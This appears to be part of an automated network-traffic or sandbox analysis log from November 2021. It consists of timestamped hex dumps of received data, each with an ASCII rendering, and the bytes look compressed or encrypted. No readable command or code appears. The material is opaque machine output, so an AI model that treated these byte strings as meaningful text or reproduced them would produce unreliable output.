                                                                                                  2021-11-24 13:17:14 UTC440INData Raw: 12 39 2c 91 5c c3 77 dc 5f 45 4d e1 7a 07 5b cf c6 0f 09 f6 b9 ea c1 72 72 c4 c3 03 a9 d1 55 e6 23 8e e4 3d 7e e6 e4 00 68 2f 9b 45 00 85 09 4c 9c 87 36 6a ae 4c 91 63 88 2c 3a 00 01 82 e7 ca 06 2d 4c 62 c3 0d 4c e8 70 2d 3b a3 0d 3b 6e eb c3 a0 1d 90 6f f9 9e c7 1c 2d 7a 03 9f bc 76 4f 0e 1d 4a d0 b1 50 2e ff a1 59 22 de b8 a6 02 73 c4 76 34 12 c3 bc c5 33 bd 80 ee 29 f9 de ca 92 e0 f9 d0 d3 fc 52 74 46 53 cd 58 bc 7d 15 b4 af 9f ad 48 8d 92 68 1a 05 b8 75 c0 2e de 79 04 36 e1 8e 63 48 82 bb 63 1b 84 25 21 66 c4 dc 03 40 9f 44 b8 bb b1 97 bb b7 6f 8c c2 4d a5 ee 49 8c dd ac 49 23 7b f7 96 bb 19 3a fb 12 cf ee cb 4d dc 5d 26 75 d4 36 7d 93 c8 9e a2 2f 2b 9a fe 39 f5 43 c9 f1 d7 b9 78 cf 45 3e a1 5f a6 9a 54 ad 8d 10 8c ef 1e 94 69 e1 14 85 fa 51 dd ba 4d
                                                                                                  Data Ascii: 9,\w_EMz[rrU#=~h/EL6jLc,:-LbLp-;;no-zvOJP.Y"sv43)RtFSX}Hhu.y6cHc%!f@DoMII#{:M]&u6}/+9CxE>_TiQM
                                                                                                  2021-11-24 13:17:14 UTC441INData Raw: 66 76 14 4d 8c ca cc b5 28 b1 de e4 ea 5d c6 ad f6 42 f2 61 45 75 af c6 1f 46 3c fd 3d d4 2b 4f f3 e5 e2 d9 64 3a 6b f6 7f 02 54 4c 34 d3 bd b8 79 01 cb 10 64 a5 af 02 28 17 ef c3 86 63 91 8f ed 65 0f 92 fa e3 08 87 0b 22 e6 09 93 1b 89 f9 07 6e f8 c1 ad 4a c0 f0 85 dd 11 84 d4 3e 88 c9 6f 29 39 87 82 b7 b6 a0 fd 98 e4 20 6c 84 5c 7b 5a 00 5d ce 06 f3 8d 25 85 27 6f 03 85 1a 1a 4c bf 69 2f ed 64 97 72 c7 59 b9 10 87 2b 09 37 67 2f bf 06 b2 62 64 9d 1e 58 60 36 31 6e b2 13 95 12 f1 4e f6 e0 7f cc 8e 3a 20 05 15 33 0f 36 ce 84 4a 5f 69 29 04 e9 10 ed 0f 85 7b 9a af 32 a4 03 55 b0 3f 28 71 4d 9c ca 76 c4 58 a0 73 f0 47 85 20 7f bd 4d 38 a9 1d 24 b8 22 92 0a 58 4a ab 7c 3e 55 23 8e b7 b4 aa d8 06 af 3f 27 36 c4 69 f6 43 55 df 7f 56 95 64 dc db 3e 29 eb 56 66
                                                                                                  Data Ascii: fvM(]BaEuF<=+Od:kTL4yd(ce"nJ>o)9 l\{Z]%'oLi/drY+7g/bdX`61nN: 36J_i){2U?(qMvXsG M8$"XJ|>U#?'6iCUVd>)Vf
                                                                                                  2021-11-24 13:17:14 UTC443INData Raw: d5 93 df cf 3f 87 fd aa 4f f4 20 dc 8c eb 6c 29 3f fc 6d b4 50 8c f9 2a ce 69 5a ef a2 69 8d 28 c9 93 52 ef 3e 90 57 26 dd 90 4f 34 2c ec ce 87 39 5e 0a ed 62 f7 1a 31 5d 8b f9 5f ec 98 ad e2 a6 b6 27 95 0a 01 f5 83 7a 24 ab 77 9a 39 92 fa 42 d6 98 55 2a f5 55 e5 a5 08 40 e1 c2 0c e5 be da 6b b9 2c f8 69 f9 83 83 a0 16 49 ec d9 16 9a c2 14 d0 cf 23 41 e8 60 9e dc 71 d5 c4 8e 58 56 96 bb 12 46 19 48 62 28 19 83 33 71 d7 1d 52 79 9c ba fd 8b 61 12 95 69 13 b3 9d 7e f8 4f 83 42 00 d4 73 5e 15 bf 62 36 16 42 3f 74 22 19 94 a3 76 8f 48 81 1f be 9b 09 0e 8f 4b b1 15 50 f3 4a 96 bf 84 46 70 89 1e c0 35 40 f2 08 e7 77 bb 81 e0 b9 99 34 e5 fe 60 c9 bb 1f 13 f6 c5 62 42 cc 8f 77 54 5b 30 c5 de ed 52 e0 31 33 54 94 ce 04 5f d0 ca eb 85 b4 89 f3 29 c1 a0 67 2a f4 70
                                                                                                  Data Ascii: ?O l)?mP*iZi(R>W&O4,9^b1]_'z$w9BU*U@k,iI#A`qXVFHb(3qRyai~OBs^b6B?t"vHKPJFp5@w4`bBwT[0R13T_)g*p
                                                                                                  2021-11-24 13:17:14 UTC444INData Raw: 73 49 81 0e 10 39 ba cd e6 a3 2e 58 33 0d 65 fb 62 54 43 81 b0 99 29 b6 9b b1 4b 7e 2c 31 3e bc 6f 29 b0 a2 b7 75 e6 3a ec 3a 2f 07 46 08 8b de 83 00 ac 8b 19 74 23 2b 0d b8 64 a6 c2 01 f9 07 f6 ad c5 29 0f 96 6d 69 3e 66 65 cf d5 23 9d 8a 12 f3 0d 25 19 91 14 92 e2 7c db dd 0b 07 dd 44 0c d7 fe 0c 69 7d 78 9c 18 5c 21 ee 53 8a 01 d0 76 18 e7 31 2b 96 8a 28 c4 8c 17 ac 05 e3 56 76 6e 58 63 1b d0 13 fc df ea ca af 21 4e c1 6d cb c7 5c 78 a1 00 50 b3 8d 21 2a 37 d7 5b d3 4e 9e 7e ab 85 cc 42 ae 57 44 27 d2 7f 8a 48 e0 93 85 cf 69 40 ba 19 55 e9 33 f4 15 37 1b aa f9 3d ed 92 de 4f 5e 87 63 93 1f bb 57 2b 6e bc db 26 38 d2 45 92 69 79 1d 18 09 6d 07 1a 4d 9c ea c1 f4 a5 f3 f0 ca 97 02 7a 98 e8 1c 65 5e ff 68 4d 7c 60 e1 95 cc ca ef 17 d6 6d cd 04 30 b3 9d e3
                                                                                                  Data Ascii: sI9.X3ebTC)K~,1>o)u::/Ft#+d)mi>fe#%|Di}x\!Sv1+(VvnXc!Nm\xP!*7[N~BWD'Hi@U37=O^cW+n&8EiymMze^hM|`m0
                                                                                                  2021-11-24 13:17:14 UTC445INData Raw: 55 c3 03 95 55 7e 94 4c 69 c7 c4 2e 19 d2 49 3b 63 9e bd ca 4a 01 16 13 75 4f e6 bf 98 e7 7f ce 01 46 ab fc b6 55 78 41 37 f4 a1 3a 43 26 0a 3e fd 6d ea 60 de ba 19 c3 b1 d7 c3 fd 3c a5 9e 2c 3b 8b c5 c1 a3 c8 f0 e5 2c a1 5e d7 06 d3 99 e7 c7 9f 23 20 ba fc ac 58 3b d6 c0 eb e5 65 fe 95 6b 4d fa c8 9b ce a6 6f 6e 97 97 db c8 25 7e e3 52 80 ac ab 80 37 43 b0 72 97 b8 1d 3f 29 06 b4 bd 73 21 1b 87 46 86 28 e6 31 ea 67 65 ab 82 10 9e b9 f8 8a b3 9e a3 6c 41 e1 4f ac f3 83 47 5c 2f 6f 2e 9e b4 cf 2f 97 0f 17 74 c7 23 b8 ca 33 fe ae a0 67 1c 1b 85 01 2b c4 43 13 24 21 91 99 8b 5a c4 d6 c5 b0 a6 64 9c 52 40 c6 a9 1f e2 fa 0f 75 f3 b3 a4 ff 61 80 ff ec d3 b5 e0 74 4e af de 10 d5 cb 4a c3 be e8 8c 02 43 df 6f 6f 22 43 56 3d f2 24 8a 3d 74 ba 2c f1 25 79 05 a2 a7
                                                                                                  Data Ascii: UU~Li.I;cJuOFUxA7:C&>m`<,;,^# X;ekMon%~R7Cr?)s!F(1gelAOG\/o./t#3g+C$!ZdR@uatNJCoo"CV=$=t,%y
                                                                                                  2021-11-24 13:17:14 UTC446INData Raw: 11 6c 8a 3d a5 84 0a bd 36 e1 fc da fb fc 80 ab 21 1f ab 09 cd 1b 88 85 30 b8 79 9d 3c 8e ac 51 b5 d8 3a 1a 1a 53 9a ef 99 ee b2 29 c9 e2 ee 64 47 0f 31 ba 65 50 bb 0e 63 23 7d ae b8 89 d4 c0 24 04 aa bb 73 b1 a3 95 37 68 c6 8e 89 2d 5b 0c 1c 2d 31 ed bd 4d 9e 11 c4 f4 93 22 93 d0 50 ea 79 3a 63 f3 5a 11 4a 69 6b 7d e9 35 be df fb 71 3b 0f 4f c9 ac 29 57 6d 27 52 e2 40 61 dc b3 2a a8 11 6c b1 40 47 1e fd cf 4e 3a 26 22 bf cd ae 22 31 56 0d df 4f 1b cb be f8 b6 e4 08 d2 4f fb 83 a8 97 0a 77 32 79 71 98 d9 63 e2 12 be d0 4c 82 66 7a 71 e1 ea b5 5a bd f8 f3 2a 48 a1 1d 70 45 ac 92 b4 70 7c d1 78 05 d9 3d 83 f5 d3 a6 04 47 d8 bb f6 08 ee 18 33 73 61 63 3f 45 ae d0 e9 34 5d 87 ab 49 41 40 33 7a 63 b2 b0 50 94 56 40 47 07 3c 47 61 ad 04 be e4 d7 ea 52 14 2a 8f
                                                                                                  Data Ascii: l=6!0y<Q:S)dG1ePc#}$s7h-[-1M"Py:cZJik}5q;O)Wm'R@a*l@GN:&""1VOOw2yqcLfzqZ*HpEp|x=G3sac?E4]IA@3zcPV@G<GaR*
                                                                                                  2021-11-24 13:17:14 UTC447INData Raw: 6e 96 d5 e8 73 a5 81 4e 02 a5 e4 90 61 8b e5 02 8d fd 70 f3 5d 2c a3 07 73 de a4 98 36 06 52 0f 14 10 33 9c 68 55 c3 72 c2 34 cd 18 c3 4a 74 1c 6f 5b 3c dc e0 31 ba 8f 1e a9 17 e2 90 59 16 1a c9 f1 9f f7 a5 2a 9c 13 6b 92 21 12 56 54 90 57 16 c0 34 7d d4 17 3c 27 a9 8a 11 94 b9 6e 4f 63 70 da d4 81 f0 4c ec b5 48 81 2d 8c 7f fe 1c a7 47 b3 29 e1 0b 82 ee 33 cb 67 de 34 21 7f 92 16 2d eb a9 cd 60 20 61 ef cb fe 9c a2 70 88 a4 52 6b bf 60 3b d4 34 c9 d7 fd 2d 7c 86 35 4c b8 76 53 95 86 41 6e ff e7 37 d4 af 6e 7c fc e6 10 33 af e1 f4 67 b9 e0 fc d3 80 22 98 f0 63 e1 b8 75 c6 2a c4 7f ea 80 62 65 7b 16 a0 db b7 95 c9 0c 79 fe 47 17 35 d4 33 f0 2f 84 85 94 14 6b 56 4e 60 df 4e e2 b2 0a a6 da 9e 39 6d 38 da 3c a0 a7 1f 4e 23 7c a5 51 f8 a4 0a 6d 50 d4 be fc fd
                                                                                                  Data Ascii: nsNap],s6R3hUr4Jto[<1Y*k!VTW4}<'nOcpLH-G)3g4!-` apRk`;4-|5LvSAn7n|3g"cu*be{yG53/kVN`N9m8<N#|QmP
                                                                                                  2021-11-24 13:17:14 UTC448INData Raw: df 63 36 e1 ab 74 f1 c7 66 7e 02 ce b1 77 8b 7e 31 96 0a 58 3d 5f f4 c1 77 e0 ed 5c ac ce 54 3c 9c 0d 2a 0e b1 1b 9a e5 b9 a6 35 52 3a c4 a0 ab 43 1a 0a 3b 91 5c 16 ae 6d c1 f8 9f 70 bb c5 93 ce d6 ad 6f c6 11 a5 74 a6 39 f1 d8 35 57 d8 6c 8f dc 92 07 89 3e 5e 1c 2b f5 a8 d8 6c 29 c3 4c e6 78 fa 94 32 4a 4e 53 6f a1 97 bf e0 5e 61 16 d6 ca 18 ed 2d 98 5d ac f8 30 e5 7f 7f 70 3b c9 00 bc 40 87 3c 52 ba 3a 98 85 cc c3 6c e5 5f 39 5b 0e d9 12 94 c8 37 49 10 ee 80 90 3e e7 36 13 70 66 4f 56 2e 3e fb 5a fe df c4 1e cd ac 69 86 79 61 0c d3 31 fb 68 01 12 0a 31 b5 68 ca 07 97 66 19 58 99 8a c8 45 8a 7a 53 ad 74 f9 06 c7 1f eb 1e d1 b0 f2 9a fb 16 d6 f0 be ae ee ee 7e e2 d9 35 1b e2 99 a8 aa bf 5f b8 9c 93 f2 f3 21 cc 03 7f 5f 16 0b c6 92 20 81 4f 46 ce d6 b4 0f
                                                                                                  Data Ascii: c6tf~w~1X=_w\T<*5R:C;\mpot95Wl>^+l)Lx2JNSo^a-]0p;@<R:l_9[7I>6pfOV.>Ziya1h1hfXEzSt~5_!_ OF
                                                                                                  2021-11-24 13:17:14 UTC450INData Raw: 07 9b 49 95 da 3f ed 2b 75 f1 65 61 3b 63 8a 4a c5 e6 13 57 b0 55 c0 53 8e 88 d4 ea 3a 89 4b d6 9d cb 7e e6 6e 16 ed c9 5f cd 57 2b b2 c5 a0 32 d8 68 55 62 b0 c8 fa e0 e2 43 57 44 67 26 23 8a bf e3 16 06 16 cd f4 11 0a 10 52 f8 8d 08 53 3a a8 b3 d5 4b 87 6b 45 b8 0c 6e a7 06 34 d5 21 63 1f 15 5c 9f 79 e4 40 e5 b6 e5 47 22 6d ae 5f 21 24 c3 dd 54 5a 0e 16 12 28 75 02 0a 05 64 6a 24 d7 32 b4 df 66 e0 46 7a 21 46 5d a6 e2 3c 30 fc 4b 5b 84 6c 1d 29 07 77 6c 96 56 72 c0 9f 81 dc 67 c6 38 29 db 9c 92 a7 7c ee f3 4c fb 18 3a 27 10 ca 64 ea 49 c7 b9 f3 be 50 fb 8a d9 53 a4 c3 23 5b 78 72 40 26 7b 9e af c5 64 fc 1c 5b 24 37 73 25 7c 7f 7e f2 74 0c af 29 3e 45 3e 36 e8 43 db d7 33 16 f9 34 65 5a a7 bd 0d 58 3a a2 28 e8 20 b2 fb a3 a6 d4 74 5e ec ac 90 c2 93 40 4f
                                                                                                  Data Ascii: I?+uea;cJWUS:K~n_W+2hUbCWDg&#RS:KkEn4!c\y@G"m_!$TZ(udj$2fFz!F]<0K[l)wlVrg8)|L:'dIPS#[xr@&{d[$7s%|~t)>E>6C34eZX:( t^@O
                                                                                                  2021-11-24 13:17:14 UTC451INData Raw: d2 c3 6a 4f b6 ec c9 89 e3 f5 44 cb 64 47 ed f3 d7 62 ce c8 e2 7f 67 48 f2 74 97 18 54 39 81 7b 70 ee f6 38 26 7a 57 eb e5 8e 6a c8 11 2b 44 a1 c9 f5 2f 95 a9 59 aa de b7 0a 87 fd 68 72 08 81 15 83 6d 16 1f a2 86 a9 44 51 55 8f 83 fa 7f 5f e0 16 a6 0c a1 9a 50 da 37 e3 dc 39 c5 fd e8 5b e8 e3 6a 09 3e c5 d7 c6 b2 c3 3e ed 75 78 1b 9f 72 06 2e eb 02 a3 b3 37 2d a8 ff db f6 01 82 78 5b 65 ba 42 02 b7 bb 43 45 f6 47 7f 32 32 e4 63 ff 79 fc 1e 50 d1 db c6 33 c2 11 8b 23 36 04 c0 ee 37 d4 da 76 d1 6b 9c 96 8a 1b aa 33 54 67 26 03 ab d8 c9 07 43 1c 96 4b cb 4a b8 4c c2 fd 85 c5 31 d6 ef 2b 3a ee 89 fc 74 2e d3 a1 f1 3c cc 6b 8c 9b 2a 13 a8 17 59 28 3a 25 f0 11 d0 14 3d 80 0d 90 ec 6e 81 bb 10 71 a4 e5 69 78 7e 66 37 b5 25 ca 92 ae 80 08 4c 72 83 09 f1 dc 22 c6
                                                                                                  Data Ascii: jODdGbgHtT9{p8&zWj+D/YhrmDQU_P79[j>>uxr.7-x[eBCEG22cyP3#67vk3Tg&CKJL1+:t.<k*Y(:%=nqix~f7%Lr"
                                                                                                  2021-11-24 13:17:14 UTC452INData Raw: 52 58 b6 8a db 7c 77 4d b0 0c eb 07 5f 45 a5 a6 74 34 22 7e 80 7e b5 62 7c 52 73 f1 22 c7 10 c4 ef f1 2a bb a9 bb ce 48 19 68 c6 4a d8 2b 7b 6b c9 0f 1a d0 38 b2 63 6c 59 d6 a4 90 e7 66 79 35 b6 24 64 a3 f5 24 4d 03 04 a8 68 83 e6 7c 65 ad c6 6b 7c 04 b1 58 1e 14 9e 04 61 ed c9 92 16 c2 aa 0e 94 ec 95 29 fb 44 2d e7 4a ee e2 e6 28 46 29 4b f0 87 4a 09 15 fe df ee c4 b4 e2 8f 44 d1 61 5c 24 82 be a5 b4 b9 2c 60 9f 97 ac 30 f8 74 e6 ff 86 b5 68 e3 f4 91 fc 5a 43 df 52 49 a9 11 c0 bc 97 e1 b4 ab 7d ad 8e a4 38 73 c1 77 1a 50 84 53 46 95 29 2f 4b ac 6d 72 3d 4e 3a f7 4c 5e d2 4c b3 1d 2d 24 9e b2 91 d4 be 92 1d dc ef 25 5d f6 4d c6 3e 13 9b 2c 75 9d 09 66 42 26 92 fa 4f 5b 72 86 96 5f bf d6 9c 0b 1b c6 a5 eb b1 5a 20 20 55 aa 84 a2 96 8c f5 05 90 c6 8c db e0
                                                                                                  Data Ascii: RX|wM_Et4"~~b|Rs"*HhJ+{k8clYfy5$d$Mh|ek|Xa)D-J(F)KJDa\$,`0thZCRI}8swPSF)/Kmr=N:L^L-$%]M>,ufB&O[r_Z U
                                                                                                  2021-11-24 13:17:14 UTC453INData Raw: ca e0 86 8e bd ad 5e 7a bc 14 b5 d5 58 05 23 54 3d b3 46 f2 de ba 2a c5 e2 ec d8 03 23 a2 6e 8f 4d cf 8b ad 64 31 62 d5 bc 82 ef 4c 4c bc 04 08 20 08 1d d2 83 1f 1e 4e 0a b7 d1 69 9d 44 b0 86 6b 3d 7e 71 11 43 e1 4c 61 5e a6 fc 56 d7 f2 5f d6 5e 95 1f f7 47 48 f5 70 be e5 07 bb 5b c8 9d 23 95 a3 0a bc 3b 3f 77 b8 c8 b2 68 b4 52 15 a2 e8 55 b2 ab 8c 9b 85 1a 3b 5a b7 60 4a 28 83 0e 4d c1 cd 18 00 a9 b2 3b b3 84 56 f8 13 08 a8 fa 1c 4f aa 96 58 6e e9 15 1a 8d fe 3b 08 8d 38 9c 69 bf 4d 31 58 36 be ae 04 f1 c9 8b 79 e6 9f 13 07 fb a1 0c 52 07 f9 ef 15 f9 cc 80 af d6 1a c1 5e 59 7a 93 fd 04 42 0f a7 06 13 5d 44 ba 53 3f 83 11 34 cd 29 20 9c 40 96 d5 ec ab 2a 20 d1 7f 6c 4f 6a 14 d5 58 a3 ce 78 a9 e2 e1 42 55 7f c9 bb f1 f6 00 91 5f 46 f6 2e f5 9f 33 b6 c0 3b
                                                                                                  Data Ascii: ^zX#T=F*#nMd1bLL NiDk=~qCLa^V_^GHp[#;?whRU;Z`J(M;VOXn;8iM1X6yR^YzB]DS?4) @* lOjXxBU_F.3;
                                                                                                  2021-11-24 13:17:14 UTC455INData Raw: b2 a7 ea 5b 1a 3e c6 89 41 1f 99 c4 67 2f 50 b4 09 80 7d 3d b3 9b fb db ea 95 ab 2c bf d5 19 c5 6d 2c e9 f6 22 aa 1c 52 e4 7e ac 59 c4 98 01 56 ec 29 cc 18 93 18 1c b5 d6 ae 60 5d 98 d1 49 3d bd ca 83 fb 9c 30 3b f8 e5 cb 7e 4a ce 6d 0d f9 d1 40 4a 60 9b 4e ac 05 e3 fd ac 27 3b 47 b6 01 77 72 1e b9 5d 31 a1 ce 9d ae dd bf 89 39 b3 fa 2b b8 d6 5c 5d 12 93 a3 0f d3 db 51 a4 d1 23 a3 d6 0d 16 c5 23 ea a4 e4 b4 77 dd 10 7d d5 82 5c 16 83 59 b2 4d c1 9d 2a f9 f0 04 e3 53 7f 69 bc 9e 13 4f 70 d1 89 e0 e3 ff 57 d7 a1 65 55 9c e0 a6 cb 49 47 2b 9c 8d 93 66 60 07 2f e6 65 89 0e 1a 49 4f 3c 5b 66 be 3e 8d dc 59 9d 5f 05 06 2c 98 97 79 cf 1f 0c 72 9e 5e a8 8b da d0 41 ae ab 5c 24 24 51 8e 3b 62 ed b6 d7 d2 b2 75 5d 54 c4 7e 31 d2 0c c7 6d 52 6f 92 79 db 39 52 56 a7
                                                                                                  Data Ascii: [>Ag/P}=,m,"R~YV)`]I=0;~Jm@J`N';Gwr]19+\]Q##w}\YM*SiOpWeUIG+f`/eIO<[f>Y_,yr^A\$$Q;bu]T~1mRoy9RV
                                                                                                  2021-11-24 13:17:14 UTC456INData Raw: 37 91 f3 32 87 1d f5 0a d5 b4 a5 85 3f ab 4c 9c 9d 00 ed b4 87 3b 74 bf 7b 8b 46 03 1a 2d ac 2b a4 12 7d 55 d5 be 2f e6 97 49 a7 64 dd a0 e0 29 9f ae 9e 7b 38 4c 14 b9 c5 c2 57 7f e1 73 bb ff b3 75 16 26 f9 a3 61 ef bc 1e d3 0c 3a 98 21 49 e4 c0 55 1b 09 15 d1 12 8d 85 93 72 44 31 1b 7e 04 65 68 fe 78 b0 1b df f6 dc a1 64 ad d5 c1 69 c8 79 b2 14 6d 58 fb de 40 df c8 aa 67 1f 40 63 7c 0b a6 fc dd 11 e8 65 94 02 01 9c 4d 3b 15 b6 0c cd 16 7d 2d db 6d 86 d0 92 db 2c 43 01 ab 9e 1e de e3 4c 46 5f a6 21 c3 f4 fc d1 8e c2 f5 9c 86 5d 27 06 28 26 4d 29 05 b1 23 98 80 67 fa 4c f0 4f 0e 32 98 a8 4a 21 8e e3 0a 55 32 85 7b 29 c9 c9 ea 66 04 cc 81 9f a0 b8 44 12 83 5c 3a 7a c4 43 49 75 72 c8 d4 7d f1 d9 e4 02 06 32 03 37 bc 8c c5 02 6f f3 bb b9 aa 65 82 f9 92 6b 51
                                                                                                  Data Ascii: 72?L;t{F-+}U/Id){8LWsu&a:!IUrD1~ehxdiymX@g@c|eM;}-m,CLF_!]'(&M)#gLO2J!U2{)fD\:zCIur}27oekQ
                                                                                                  2021-11-24 13:17:14 UTC457INData Raw: 22 19 94 4c 4b bd de bc cf 8a 02 2b 5c bf 44 80 81 79 c3 4a 6c ba 14 88 2f 60 4d 4e 71 63 d8 94 b9 bd cc 44 fb 9f 22 b7 00 b2 d8 fe 8f b0 1e 1f aa 89 e5 b7 d7 dc 43 5b c1 ad c1 54 74 c7 56 28 96 9a 35 9f e9 62 27 e4 5d 51 d8 ee 55 6d d3 10 db 3c 39 56 b1 ad 8c 47 7d 51 ad f8 9b 0b 8f 16 64 da 29 ff 3b 8a 4e b1 fd b4 b7 50 57 26 ca 81 af 2a f2 4d 2a b8 44 49 95 1a 1f 78 48 cb c4 7f 28 77 25 3c d6 14 af f0 8b 4a b7 46 d5 48 98 48 14 19 a2 21 2f 98 7e 50 5c 72 74 eb 3f 4e 1e 95 bc 39 72 27 bf 7c 7e 9f 17 1e 7a 11 25 37 6c 83 17 03 7d 28 48 2d 45 11 b7 b4 5f 7b 84 19 36 be ac 82 da fc 01 0f ce 8e d2 94 8a ed 21 dc a1 23 c9 99 3e 3c 56 30 f9 81 0f bf a5 0b 1b da a7 9b fc 7d 90 d7 6d 10 f4 a1 d3 08 02 87 ba 6d 2f fd 18 c7 4d fc 9b 5f 08 6a 3f 59 55 6e 33 03 f2
                                                                                                  Data Ascii: "LK+\DyJl/`MNqcD"C[TtV(5b']QUm<9VG}Qd);NPW&*M*DIxH(w%<JFHH!/~P\rt?N9r'|~z%7l}(H-E_{6!#><V0}mm/M_j?YUn3
                                                                                                  2021-11-24 13:17:14 UTC459INData Raw: 7c 79 dd 44 f0 f5 fd db 22 83 d8 05 51 c3 78 6c 43 b6 15 4a df 6d 19 4b f1 54 24 b8 e1 03 82 27 68 a4 e0 5a fd 65 f8 c3 17 6f 37 00 64 a3 91 70 f2 07 d6 b0 f0 e6 8b cc b2 50 2c 33 98 02 9c 15 c4 00 52 5b 59 4e d1 5f 5f 79 45 f7 91 98 a0 d7 93 90 0f d0 cf 5b b1 c2 ff eb 97 c9 fe c2 28 81 50 84 55 96 c6 3b 51 46 fb 64 46 78 67 05 38 8f de a2 16 45 ee ff a8 dc 8b cd 25 8b a8 a6 a3 63 26 51 de b8 25 f9 bc a4 5f eb 28 8a f1 1e 67 b8 37 a8 3d 1d 13 fd 84 e7 06 f1 dc a7 f5 30 79 92 9b 69 03 95 e8 d0 be 49 2e 61 b5 87 53 70 94 68 58 19 ea b6 f1 7d 44 ef e4 0c a3 9f 63 05 7d ad 3c 34 d4 56 b4 63 f2 43 b2 5d 62 32 39 c1 29 c4 ec c7 ac 36 de 85 57 b8 27 e8 8b b5 43 2b 7d 14 36 4e cf e4 b0 b4 76 00 4f c0 b0 0d a3 6b 2f 12 3a 08 e5 85 75 48 8f 83 58 80 1c de fb 30 65
                                                                                                  Data Ascii: |yD"QxlCJmKT$'hZeo7dpP,3R[YN__yE[(PU;QFdFxg8E%c&Q%_(g7=0yiI.aSphX}Dc}<4VcC]b29)6W'C+}6NvOk/:uHX0e
                                                                                                  2021-11-24 13:17:14 UTC460INData Raw: 55 d7 63 46 8f bd c7 1c 72 83 e1 3b 89 b1 4d 6f 4a e3 34 af 8b 67 28 a7 bc 58 41 4c 06 3d 0c 20 df 3d 9b 55 2f 65 66 b5 64 fc fb 10 b5 bf 9d d7 fe 35 80 0b dd 18 c8 a2 ed 3f 38 5e 21 10 64 ba a4 18 df 30 cf 22 f9 08 a2 9b c4 5b 05 44 f5 87 9e f7 58 51 e8 bb b9 8c ca 99 72 43 cd 1d 9a 39 f4 fd b4 a4 08 d9 15 e6 fa 96 01 6d 91 18 25 23 81 bb 2b 26 31 01 68 0c cc 42 6e b5 7f db 04 8b 81 39 aa a4 2b 85 58 93 d8 cb bf 9e 6c e6 1d 30 3a 47 37 ab 23 77 de 48 5a 02 69 f9 7b 4c c4 b4 09 89 8e 93 c2 e0 c8 2d c3 cd 45 a2 51 1b 03 aa ea 8a f7 29 c8 67 d0 79 6c 7c 5b 16 67 c6 1b 6a 2a 9a 16 ef af c1 f2 d8 62 39 d2 e2 d6 d4 e3 38 cd 3a 3f 02 75 29 25 9e 40 bf a5 9c b5 9e 1b 7e 6f 5d 1f d2 ea ee df 8d 35 4c a8 7f 03 f1 30 99 37 43 45 0d 0d 2c bd e5 b0 68 b8 e1 3c 21 4b
                                                                                                  Data Ascii: UcFr;MoJ4g(XAL= =U/efd5?8^!d0"[DXQrC9m%#+&1hBn9+Xl0:G7#wHZi{L-EQ)gyl|[gj*b98:?u)%@~o]5L07CE,h<!K
                                                                                                  2021-11-24 13:17:14 UTC461INData Raw: 84 23 c5 dd 8c 6f 14 6d e6 3d 46 3c 67 5e bc c7 71 42 aa 97 9e a7 41 dd 69 18 0c 3b 40 7b 9c fd 4b f2 23 4f f9 19 93 e4 5a 1e e1 05 6b 50 e8 87 46 01 5b bf 20 ea 1b 1b c8 83 96 4f 21 49 e5 49 1b dc f7 9b ba cc 80 8d 8e 40 40 25 cf e8 9c a7 82 ad ff 71 d1 e4 c7 28 0c f3 d7 54 af 97 04 54 e5 8e 3f 63 59 23 89 26 cd 12 6c 2e 80 c5 84 d3 4c 72 84 63 9d 73 4f d3 98 b5 ec b5 e6 d6 d5 25 bc 99 fa 0e 10 68 7f 3a 16 9c db d5 eb 33 0d cf 0b 92 d8 fb 51 ab 7c 6e a8 9e a0 74 80 3e 2a ba b2 e2 51 12 3b fd 61 86 3b a4 bd 44 ae 78 a5 8c 73 c3 f0 7d 01 3c c6 bf da 45 0d 77 93 12 94 c5 30 c6 02 65 a5 9e cc b6 b9 34 9f 68 dd 70 1c 45 a8 7a 89 19 d9 08 e6 fd 24 53 b5 99 0e 77 e6 99 d2 b9 d4 16 30 45 d1 af 41 87 1f fa 33 24 33 6c a2 b4 49 eb 9c 1d 46 f8 a6 f3 d5 9d c5 64 f6
                                                                                                  Data Ascii: #om=F<g^qBAi;@{K#OZkPF[ O!II@@%q(TT?cY#&l.LrcsO%h:3Q|nt>*Q;a;Dxs}<Ew0e4hpEz$Sw0EA3$3lIFd
                                                                                                  2021-11-24 13:17:14 UTC462INData Raw: 86 e7 be 76 0c b8 77 b9 91 3c 76 54 22 3b 1f f2 53 d1 75 1c 43 56 14 0a 2b a3 8a b9 9b 53 26 4a be f5 82 62 5a a4 07 ef c5 7a e4 7c 7f 26 60 bc ce 93 b0 b6 3e 10 ff 19 97 41 49 9e f7 6d f1 3f 18 a2 fd a7 84 e0 23 fd 11 bf 44 71 3f 86 4e 94 a3 9a 02 cf f1 f2 4f c4 b9 7d 72 38 b7 25 0d 39 0e dd 31 3c eb 43 19 87 39 31 11 6b a9 df 36 b1 ef 89 63 d3 de da 02 b8 1b 9e 94 e7 1b 3d d0 dd d8 19 b1 21 3e 79 b6 45 bc 9d 64 86 db 83 06 2e cf ea 74 e1 9c 95 60 01 e7 e0 88 eb 3c 65 9b ee 1b 16 02 9a 96 02 39 46 e1 9e 7f 48 16 66 3f 41 5a 29 9e 4a 0c 5b d2 ea 09 3f 7b b5 f9 56 c7 0b a8 65 d8 a6 6d a4 5d 56 02 6f 2c 67 e7 ee 02 cd 4a 5e 37 f6 a3 c4 96 06 5c 75 f7 2e ca ec 33 bb b7 3b f8 e0 33 9d 46 b0 e9 b8 51 f9 55 a4 8f 33 e9 66 10 1f 4f 4a 1a af 80 4e 30 89 0a c4 00
                                                                                                  Data Ascii: vw<vT";SuCV+S&JbZz|&`>AIm?#Dq?NO}r8%91<C91k6c=!>yEd.t`<e9FHf?AZ)J[?{Vem]Vo,gJ^7\u.3;3FQU3fOJN0
